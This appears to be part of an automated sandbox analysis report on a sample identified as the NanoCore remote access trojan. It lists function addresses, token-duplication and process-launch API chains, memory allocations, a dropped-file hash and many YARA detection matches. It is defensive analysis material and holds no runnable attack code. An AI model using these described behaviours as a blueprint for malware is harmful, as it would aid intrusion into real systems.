Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FC28F0 5_2_00FC28F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FCC8CE 5_2_00FCC8CE
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FD088F 5_2_00FD088F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FC1903 5_2_00FC1903
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FFEAD5 5_2_00FFEAD5
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0102EA2B 5_2_0102EA2B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FD3BA1 5_2_00FD3BA1
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FD0DE0 5_2_00FD0DE0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FC1D98 5_2_00FC1D98
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FF2D2D 5_2_00FF2D2D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FF4EB7 5_2_00FF4EB7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FFCE8D 5_2_00FFCE8D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FD1F2C 5_2_00FD1F2C
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 6_2_009243A0 6_2_009243A0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 6_2_0092B310 6_2_0092B310
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 6_2_0092DEB8 6_2_0092DEB8
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 6_2_00923788 6_2_00923788
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 6_2_0092BF28 6_2_0092BF28
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 6_2_0092C800 6_2_0092C800
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 6_2_00924458 6_2_00924458
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 6_2_0092BFE6 6_2_0092BFE6
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 13_2_00933788 13_2_00933788
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 13_2_009343A0 13_2_009343A0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 13_2_00934458 13_2_00934458
Contains functionality to launch a process as a different user
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FF6219 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 5_2_00FF6219
PE file contains strange resources
Source: mmuiqlcvwo.pif.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\Public\vbc.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\Public\vbc.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\Public\vbc.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\Public\vbc.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\Public\vbc.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\Public\vbc.exe Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\33920049\mmuiqlcvwo.pif C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: 76E90000 page execute and read and write
Yara signature match
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
